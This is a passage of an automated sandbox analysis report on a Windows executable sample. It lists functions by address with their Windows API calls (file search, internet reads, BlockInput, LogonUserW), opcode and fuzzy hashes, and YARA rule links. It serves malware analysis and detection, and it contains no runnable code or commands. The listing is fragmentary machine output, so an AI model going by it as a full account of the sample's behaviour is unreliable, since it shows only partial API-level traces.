                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                          • String ID:
                                                                                          • API String ID: 3397143404-0
                                                                                          • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                          • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                          • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                          • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                          Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: ACCEPT$^$h
                                                                                          • API String ID: 909875538-4263704089
                                                                                          • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                          • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                          • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                          • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                          Function 0040D7F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _set_new_mode.LIBCMT ref: 0040D88C
                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D8B9
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                                                                                          • String ID: Wu
                                                                                          • API String ID: 1188159508-4083010176
                                                                                          • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                          • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                                                                                          • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                          • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                                                                                          Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                          • API String ID: 0-2165971703
                                                                                          • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                          • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                          • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                          • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                          Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                          • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                          • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                          • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                          Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                          • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                          • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                          • String ID:
                                                                                          • API String ID: 48322524-0
                                                                                          • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                          • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                          • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                          • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                          Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __time64.LIBCMT ref: 004433A2
                                                                                            • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                            • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                          • String ID: rJ
                                                                                          • API String ID: 2893107130-1865492326
                                                                                          • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                          • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                          • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                          • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                          Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __time64.LIBCMT ref: 004433A2
                                                                                            • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                            • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                          • String ID: rJ
                                                                                          • API String ID: 2893107130-1865492326
                                                                                          • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                          • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                          • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                          • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                          Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 901099227-0
                                                                                          • Opcode ID: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                          • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                          • Opcode Fuzzy Hash: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                          • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                          Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                          • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          • API String ID: 2295610775-0
                                                                                          • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                          • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                          • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                          • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                          Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0vH$HH
                                                                                          • API String ID: 0-728391547
                                                                                          • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                          • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                          • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                          • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                          Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset
                                                                                          • String ID:
                                                                                          • API String ID: 2102423945-0
                                                                                          • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                          • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                          • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                          • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                          Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Proc
                                                                                          • String ID:
                                                                                          • API String ID: 2346855178-0
                                                                                          • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                          • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                          • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                          • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                          Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • BlockInput.USER32(00000001), ref: 0045A272
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockInput
                                                                                          • String ID:
                                                                                          • API String ID: 3456056419-0
                                                                                          • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                          • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                          • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                          • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                          Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LogonUser
                                                                                          • String ID:
                                                                                          • API String ID: 1244722697-0
                                                                                          • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                          • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                          • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                          • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                          Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                          • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                          • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                          • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                          Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                          • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                          • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                          • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
